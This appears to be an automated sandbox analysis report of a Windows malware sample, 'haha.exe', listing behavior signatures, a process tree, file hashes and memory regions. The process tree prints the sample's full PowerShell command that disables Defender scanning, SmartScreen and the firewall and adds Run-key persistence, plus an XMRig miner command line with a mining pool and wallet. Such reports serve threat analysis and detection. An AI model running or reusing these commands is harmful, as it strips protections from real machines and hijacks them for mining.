Analysis

  • max time kernel
    608s
  • max time network
    603s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    07-07-2022 08:03

General

  • Target

    haha.exe

  • Size

    3.0MB

  • MD5

    9984a772edde2f48200fe346b4ef8547

  • SHA1

    c8760bb8c67926372461f2a43471ac1466c024ed

  • SHA256

    9f2c2e2bcc9acf06fde3c0066db3befe4f89dad3cc66821c1633c5491eb10a5e

  • SHA512

    e144e0f43888e503a0c866bcc059e3152a5fa4464232d3e2df5bc559b55e9a8128070bbc353ec8ca427187abc58ddd37ff211a071bbbe2200395590ead1ba1da

Score
10/10

Malware Config

Signatures

  • Modifies security service 2 TTPs 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 7 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 51 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\haha.exe
    "C:\Users\Admin\AppData\Local\Temp\haha.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2136
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -F C:\Users\Admin\AppData\Local\Temp\79571.ps1
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1172
      • C:\Users\Admin\AppData\Local\Temp\79571.exe
        "C:\Users\Admin\AppData\Local\Temp\79571.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2284
        • C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe
          "C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe"
          4⤵
          • Executes dropped EXE
          PID:2748
        • C:\Users\Admin\AppData\Local\Temp\DllHost.exe
          "C:\Users\Admin\AppData\Local\Temp\DllHost.exe"
          4⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Drops startup file
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1444
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
            5⤵
            • Modifies security service
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:33560
            • C:\ProgramData\UpSys.exe
              "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:67976
              • C:\ProgramData\UpSys.exe
                "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
                7⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:94360
                • C:\ProgramData\UpSys.exe
                  "C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
                  8⤵
                  • Executes dropped EXE
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:94992
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                    9⤵
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:94460
            • C:\Windows\system32\netsh.exe
              "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
              6⤵
              • Modifies Windows Firewall
              PID:85036
          • C:\ProgramData\Systemd\procexp.exe
            --url pool.hashvault.pro:80 --user 42kFTbPkrpEY8KRSdRjzLpawdNvmR1BTKPRfaaGoq9TcDNhnKapy9G99eH9AsJon766YDYnKEobxycNSDuHbPG3JHV5zKut --pass x
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            PID:69608
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
    1⤵
    • Suspicious use of NtCreateUserProcessOtherParentProcess
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:92304

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\ProgramData\MicrosoftNetwork\System.exe

    Filesize

    440KB

    MD5

    6368031626da1f0d51bcac43104b123f

    SHA1

    5a340a1a3edc0bf03526e677a0415ffd156c139c

    SHA256

    11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d

    SHA512

    442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

  • C:\ProgramData\Systemd\procexp.exe

    Filesize

    7.9MB

    MD5

    2d9fb9ed8bebb55280b81a4652dcfa11

    SHA1

    76300e059e74d8cfc99a736917cd3a512dd32cab

    SHA256

    573fc41ae5b597cbb3e2255224013aa861d23b6608b2efef20685ff393e6b8bf

    SHA512

    ae984a21cbf9c556407ad8ee60c07342884d5905cd0e9aece195ed44cca82d434b24da931be346e1cecea8fca856af6dd3dcd2994f95f5895647fe029650ce9c

  • C:\ProgramData\UpSys.exe

    Filesize

    923KB

    MD5

    efe5769e37ba37cf4607cb9918639932

    SHA1

    f24ca204af2237a714e8b41d54043da7bbe5393b

    SHA256

    5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

    SHA512

    33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    16KB

    MD5

    0c15ac263e9da0baa9287d105570e6f1

    SHA1

    99aa6487b21dc6e1cd5f4a097313508df50f0829

    SHA256

    40dc53e1f4d85e4c22d6e35799dc25639d1da6e27805c34f6af092b68a8735c3

    SHA512

    2aeef83af972de648d126b8fc347e5142113a842a2280f97435e85c8c0c5700dcf390b2c5afa3f5b868a0c404fc2c47ae73178b666677529ae7b3c63c7f67cac

  • C:\Users\Admin\AppData\Local\Temp\79571.exe

    Filesize

    1.8MB

    MD5

    cb9659a181ad8cc58023c5d8566b2d5a

    SHA1

    7b6c751aefca16847c2b1e57712342a7dffe585f

    SHA256

    d08aeb5728d24a7b12f86c2751382d15572bdebbff06fa083c4a792592074cc2

    SHA512

    6d6bc8815cae73207c0dd9825ce8b8d7b4191a37c05c3bff1ebd5189a4f0db0b84c067126b0050fae34725c5de9cdb8cceb8ec6296be2099a2c12ad93deb7c24

  • C:\Users\Admin\AppData\Local\Temp\79571.ps1

    Filesize

    128B

    MD5

    d831df909c8d68d7ac710f09ea9a7294

    SHA1

    4cf51399d9895c799c297e5e3078fa25cf4940b5

    SHA256

    9771d530fb3067031df355268df854d6f162d97074ae8883ffb30b7350cf8f0c

    SHA512

    000959c53063ee99db5ec20448a23e6406720c611ed225b7f8ed92855c1c576b2127cb48c6508cb61a00c9ab96fc40bed81a94e5db5ff18db520aacf48ac0e77

  • C:\Users\Admin\AppData\Local\Temp\DllHost.exe

    Filesize

    440KB

    MD5

    6368031626da1f0d51bcac43104b123f

    SHA1

    5a340a1a3edc0bf03526e677a0415ffd156c139c

    SHA256

    11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d

    SHA512

    442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

  • C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe

    Filesize

    2.8MB

    MD5

    77636b47fc9e1bc61a4a019371e09390

    SHA1

    615275ae7a28ee86cd9f4f586a3c7c5366490444

    SHA256

    7fbed14d0d7d52a459fc29bae6a62eedd0a69649049b8f9ac37e1297acc3b277

    SHA512

    ea73fe48dc36d0dd2344e3389bb70a7f047a210f08578bdb5ff4e690e3f95fab0412edcb52819234ca28ff0d983fa8646bc1e2e76f1134df937896f115f8c37d

  • memory/1172-130-0x0000000000000000-mapping.dmp

  • memory/1172-139-0x0000000006C40000-0x0000000006C5A000-memory.dmp

    Filesize

    104KB

  • memory/1172-138-0x0000000007F00000-0x000000000857A000-memory.dmp

    Filesize

    6.5MB

  • memory/1172-136-0x00000000066F0000-0x000000000670E000-memory.dmp

    Filesize

    120KB

  • memory/1172-135-0x00000000061D0000-0x0000000006236000-memory.dmp

    Filesize

    408KB

  • memory/1172-134-0x00000000060F0000-0x0000000006156000-memory.dmp

    Filesize

    408KB

  • memory/1172-133-0x00000000057F0000-0x0000000005812000-memory.dmp

    Filesize

    136KB

  • memory/1172-132-0x00000000059C0000-0x0000000005FE8000-memory.dmp

    Filesize

    6.2MB

  • memory/1172-131-0x0000000002EA0000-0x0000000002ED6000-memory.dmp

    Filesize

    216KB

  • memory/1444-146-0x0000000000000000-mapping.dmp

  • memory/2284-141-0x0000000000000000-mapping.dmp

  • memory/2748-143-0x0000000000000000-mapping.dmp

  • memory/33560-149-0x0000000000000000-mapping.dmp

  • memory/33560-173-0x00007FFE18AD0000-0x00007FFE19591000-memory.dmp

    Filesize

    10.8MB

  • memory/33560-152-0x00007FFE18AD0000-0x00007FFE19591000-memory.dmp

    Filesize

    10.8MB

  • memory/33560-168-0x00007FFE18AD0000-0x00007FFE19591000-memory.dmp

    Filesize

    10.8MB

  • memory/33560-150-0x000002B547FB0000-0x000002B547FD2000-memory.dmp

    Filesize

    136KB

  • memory/67976-154-0x0000000000000000-mapping.dmp

  • memory/69608-175-0x000001BE3CB30000-0x000001BE3CB50000-memory.dmp

    Filesize

    128KB

  • memory/69608-176-0x000001BE3CB10000-0x000001BE3CB30000-memory.dmp

    Filesize

    128KB

  • memory/69608-164-0x000001BE3B230000-0x000001BE3B250000-memory.dmp

    Filesize

    128KB

  • memory/69608-172-0x000001BE3CB30000-0x000001BE3CB50000-memory.dmp

    Filesize

    128KB

  • memory/69608-158-0x000001BE3B1E0000-0x000001BE3B200000-memory.dmp

    Filesize

    128KB

  • memory/69608-156-0x0000000000000000-mapping.dmp

  • memory/69608-174-0x000001BE3CB10000-0x000001BE3CB30000-memory.dmp

    Filesize

    128KB

  • memory/85036-159-0x0000000000000000-mapping.dmp

  • memory/94360-160-0x0000000000000000-mapping.dmp

  • memory/94460-165-0x0000000000000000-mapping.dmp

  • memory/94460-171-0x00007FFE18AD0000-0x00007FFE19591000-memory.dmp

    Filesize

    10.8MB

  • memory/94460-170-0x00000191FFED0000-0x00000191FFF46000-memory.dmp

    Filesize

    472KB

  • memory/94460-169-0x00000191E7A80000-0x00000191E7AC4000-memory.dmp

    Filesize

    272KB

  • memory/94460-167-0x00007FFE18AD0000-0x00007FFE19591000-memory.dmp

    Filesize

    10.8MB

  • memory/94992-162-0x0000000000000000-mapping.dmp